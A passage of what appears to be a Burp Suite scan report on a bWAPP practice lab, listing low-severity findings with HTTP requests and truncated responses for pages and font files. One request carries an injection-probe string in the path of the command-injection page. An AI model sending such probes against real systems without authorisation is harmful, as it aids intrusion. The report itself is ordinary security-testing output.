    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/clickjacking.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 31
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

    ticket_quantity=10&action=order

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 04:18:52 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.34. http://192.168.52.147/bWAPP/commandi.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/commandi.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/commandi.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/ldap_connect.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:53:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12927

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.35. http://192.168.52.147/bWAPP/commandi.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/commandi.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/commandi.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ldap_connect.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 04:17:45 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.36. http://192.168.52.147/bWAPP/commandi_blind.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/commandi_blind.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/commandi_blind.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12954

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.37. http://192.168.52.147/bWAPP/credits.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/credits.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/credits.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/portal.php
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.38. http://192.168.52.147/bWAPP/csrf_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/csrf_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/csrf_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13464

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.39. http://192.168.52.147/bWAPP/csrf_3.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/csrf_3.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/csrf_3.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13282

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.40. http://192.168.52.147/bWAPP/directory_traversal_1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/directory_traversal_1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/directory_traversal_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13069

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/cs
    ...[SNIP]...
    18.41. http://192.168.52.147/bWAPP/directory_traversal_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/directory_traversal_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/directory_traversal_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13075

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/cs
    ...[SNIP]...
    18.42. http://192.168.52.147/bWAPP/fonts/
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 2527
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/fonts</title>
    </head>
    <body>
    <h1>Index of /bWAPP/fonts</h1>
    <table><tr><th><img src="/icons/blank.gif"
    ...[SNIP]...
    18.43. http://192.168.52.147/bWAPP/fonts/arial.ttf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/arial.ttf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/arial.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce062-bc860-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 772192
    Connection: close
    Content-Type: text/plain

    ............DSIG.7.Y.......|GDEF...I.
    .L....GPOS{V...
    ......GSUB.B`Q...,....JSTFm*i.........LTSHCLc...7...\OS/2.2]s.......`PCLT.{>C.
    .....6VDMXP.j...E$....cmap..WU...`.."^cvt ...........Tfpgm.yY.....
    ...[SNIP]...
    18.44. http://192.168.52.147/bWAPP/fonts/arialbd.ttf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/arialbd.ttf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/arialbd.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce065-b6cb0-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 748720
    Connection: close
    Content-Type: text/plain

    ............DSIG..[...U4...|GDEF...I.
    ......GPOS.....
    ......GSUB..X%..9x....JSTFm*i...U.....LTSH...x..7...\OS/2.]^........`PCLT..AG.
    .....6VDMXV.p..E$....cmap..WU...`.."^cvt .>.....l...Zfpgm...(....
    ...[SNIP]...
    18.45. http://192.168.52.147/bWAPP/fonts/arialbi.ttf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/arialbi.ttf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/arialbi.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce066-891d0-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 561616
    Connection: close
    Content-Type: text/plain

    ...........pDSIGOD.K..zT...|GDEF............GPOS`...........GSUB......n.....LTSH.c....*4..    .OS/2..........`PCLTs.A........6VDMXU4o...40....cmap.`h...5l...Bcvt Tegf..c.....fpgmI.-G..P.....gasp...    ....
    ...[SNIP]...
    18.46. http://192.168.52.147/bWAPP/fonts/ariali.ttf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/ariali.ttf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/ariali.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce05f-87a44-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 555588
    Connection: close
    Content-Type: text/plain

    ...........pDSIGP//...b....|GDEF............GPOS..,s.......jGSUB......W(....LTSH`TO...*4..    .OS/2..}........`PCLT&.>D.......6VDMXPj...40....cmap.`h...5l...Bcvt =.(7..](...`fpgmT.m6..P.....gasp...    ...|
    ...[SNIP]...
    18.47. http://192.168.52.147/bWAPP/fonts/ariblk.ttf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/ariblk.ttf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/ariblk.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/?C=M;O=A
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce067-1d444-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 119876
    Connection: close
    Content-Type: text/plain

    ...........PDSIG#o.}........GDEF.&..........GPOS...........,GSUB-.1........bLTSH^w..........OS/2h}........Vcmap).....N....<cvt F.LQ..\....rfpgm.U.E..U....
    gasp...    ........glyf......c.....hdmx.~a2...`
    ...[SNIP]...
    18.48. http://192.168.52.147/bWAPP/fonts/atommicclock.gdf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/atommicclock.gdf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/atommicclock.gdf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/?C=M;O=A
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce061-13018-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 77848
    Connection: close
    Content-Type: text/plain

    ^... .......$...........................................................................................................................................................................................
    ...[SNIP]...
    18.49. http://192.168.52.147/bWAPP/fonts/backlash.gdf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/backlash.gdf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/backlash.gdf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/?C=M;O=A
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce063-10b40-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 68416
    Connection: close
    Content-Type: text/plain

    _... .......$...........................................................................................................................................................................................
    ...[SNIP]...
    18.50. http://192.168.52.147/bWAPP/fonts/hootie.gdf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/hootie.gdf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/hootie.gdf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/?C=M;O=A
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce064-10150-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 65872
    Connection: close
    Content-Type: text/plain

    .... ...................................................................................................................................................................................................
    ...[SNIP]...
    18.51. http://192.168.52.147/bWAPP/heartbleed.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/heartbleed.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/heartbleed.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12937

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.52. http://192.168.52.147/bWAPP/hostheader_1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/hostheader_1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/hostheader_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12734

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.53. http://192.168.52.147/bWAPP/hostheader_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/hostheader_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/hostheader_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
